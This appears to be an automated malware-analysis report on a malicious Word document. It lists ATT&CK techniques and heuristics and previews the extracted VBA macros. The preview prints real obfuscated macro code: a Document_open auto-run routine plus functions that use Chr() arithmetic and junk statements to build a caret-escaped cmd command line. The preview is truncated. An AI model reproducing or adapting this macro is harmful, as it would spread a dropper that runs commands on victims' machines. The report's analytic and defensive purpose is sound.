MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is an Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this auto-executes via the Document_open macro. This suggests the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38139 bytes |
SHA-256: 62d95974b0ef30cba862722dfe8f09cec5e79a2b43b5b88f334725319dc9619b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "AKTuYOFnaV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dNkEMsRYi()
JWCAO = (53978 * dYPEYO) / 39944 - LwszF
JOYlSQ = (97283 * NRnjdA) / 97977 - PKthhn
hNzNjb = (57688 * FrmLHN) / 52241 - mNNbj
oBiZvU = (49048 * DjLhA) / 62407 - hwMfP
skkSf = (10145 * OGzzU) / 83159 - XuGzc
Pjmwaf = (99508 * kkvasU) / 59495 - SLwlGi
RMCVw = (72362 * MWWoDE) / 33567 - wlnDal
End Function
Function RtBApYPAA()
oPibE = jJJMtY - JUZIw + 7425 * HLBtX * uPkazJ + sXXzc + 97268 / iXQaB + 5519 - PzZbO
aDTZj = OsUaK - qVHEMA + 3676 * oloowc * hjKNQ + SMmiE + 5134 / PjZnua + 70650 - RwkNH
zwAqFW = vklzVY - YmdAuM + 95935 * jKPAQ * TAQiqw + pZGrv + 20626 / SawCV + 28580 - QzCXEo
mEpIiA = sSLFvc - ALMaz + 23199 * AEsIn * GwWbTw + iZmZw + 95366 / GCCLw + 46543 - pNDaCR
qaFFN = jVVicB - MWIwBr + 68847 * LMiBt * DOGmI + Zjjmqz + 58389 / EdYtNF + 7990 - uZCzOI
End Function
Private Sub Document_open()
On Error Resume Next
PjqUW = 31203 - uERnFN + pVRNs / NGRBF - srDzfW * vjOAW - 50820 + zVbjci + 21420 - fqFJf * EIPoPc - EqFmR - 77492 - RbUvm
OOJkN = 68508 - XIqjza + iwRzRD / DAKhl - RLcOV * EXwUwC - 10801 + ZimbQ + 99545 - wuKJWl * KNwDc - XMjcN - 35693 - NfcVv
HwqMinUwi = Application.Run("waifBvXjNYt", "" + fiYaiZMMuVqVq + MGzFviWzLqtBEW + CVar("c") + PlMdhPptzr + QaSbqbHo + CcAHVKFJJ + KAVfVUfCpki + rBCWSYzn + IHjIbviEa + IwuuwYF + wGFwj + XirOfRoCc + SRFlZ + lYELZ + fVHKEVY + uBNYj + jKYFwW + GkqDqrs + ldbRijQA + LswXD + MiolivEi + NfKvWODQhw + WdQkfvK + qQOlbmJhkn + UNjQlqVRSEwv + kWsaujMC)
zdURR = 77940 - LlUpA + nqUCv / XOWVA - FcVRTV * CVSHV - 7578 + dqnKjX + 70521 - FjZdR * nwbITV - LttRz - 44006 - tUizww
bModKw = 44919 - spEiPW + zBhmRw / sjAnOl - aiUDF * PTqLN - 77552 + Bcvsh + 42973 - jzQJSk * THcXkm - SKkaJz - 54404 - KWZdpt
End Sub
Function FrIRcOKk()
OYNTiP = iVmpZA - vzHsYn + 29504 - LpdDu - qYSbt * QcUroi * 14286 + lAKwn / 58600 * aQFzrL
WUlDi = 49871 - HYOGFX + ONpAzv / TwXVT - hhYzc * JmrpCj - 25383 + bDiOK + 79907 - PlsmY * hCWNi - QNaAO - 57459 - ODWXn
vMOodC = 41946 - RLRYXA + mukpu / DVURsd - pwZqn * jTwiv - 52879 + Kwaqh + 39691 - OqTZv * DsqtWl - BtVlb - 69864 - UjpMp
uZWCT = hZwSC - wNYwfS + 28718 - iTKwo - rSmNwQ * YMiAiL * 42558 + vEHmzW / 77156 * WXXwV
XsQPJK = mRvfNE - bjUcTR + 93562 - ADUko - TsNFRm * olHEXl * 58303 + iUAZpm / 38476 * vTDpN
dEvikX = 42527 - wcAuN + ndCLK / SQdpP - FniBHk * zaovPm - 25865 + vvslj + 44375 - jGmBf * JMaFO - SibzUP - 24961 - dzinY
End Function
Attribute VB_Name = "qiUYszUOfP"
Function CcAHVKFJJ()
On Error Resume Next
IiPEo = 59962 + jQPdwf - OIEiG - iiJNdM / 78818 * QEUZmP + 11771 + 8185 / bBKVGE / DhzAYz * zZTsdY / bcqvP
svVFzlwI = CStr(Chr(iiPLQRrUIk + EGiIVkGifWoCXH + 109 + AMjaFEwBmj + WDljaHNSm)) + "d" + " /" + CStr(Chr(lvMqLqMnJvR + ARsAKhWldrIblH + 99 + tDmiiwitN + ZvwUEjpj)) + " f^O^" + "r ; "
JQGJI = hwOYac + vOoaT - VATXc + zzZUZq + (86116 / wXhuOp + 31459 * 33993)
TDwsf = BUwAY + qtdiL - Ibohhp + YhuLi + (89492 / XNDZj + 10104 * 38567)
bTUUiiPpO = " , /" + "^F" + " ," + " ;" + " " + CStr(Chr(MIFusIEDP + lXPrflNCmznZ + 34 + piXErwbSAjuhoq + pzKcoYicZwb)) + " " + " " + "deli" + CStr(Chr(QZijzCdhzX + SXizzzWM + 109 + pPtJRwuf + zvkHLwqnNs)) + "s==8R"
usNuj = 78467 - kdmJB - (33456 * VGhHjH / (16697 - GUhcp / 8767 + GJwIjn))
QrsibA = 15395 - VwREdY - (24868 * LwbmtM / (7938 - LpXcNs / 66089 + fiQPoc))
WDUNbN = "f tok" + "ens=" + " 2 " + CStr(Chr(jUVAAfbBER + kTpolhmU + 34 + KXnblzGj + TPiYoQvPD)) + " , " + "; " + "%^6 " + "; ^" + "iN ; "
ZLjXAR = 65149 - QwmLDi - (7200 * sSlcfh / (55201 - TYwHz / 83951 + PKnTBX))
Xpfwv = 92044 - cvMcvJ - (91638 * SsjSEc / (36749 - zYNXBP / 29507 + PRINn))
jSjwCv = 40615 - ZTUVbR - (9695 * iEPjX / (65525 - lMjJM / 56871 + hCTHC))
pPhBwV = " ; ( ," + " ," + " '" + " ; a" + "^^sS" + "o" + "C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.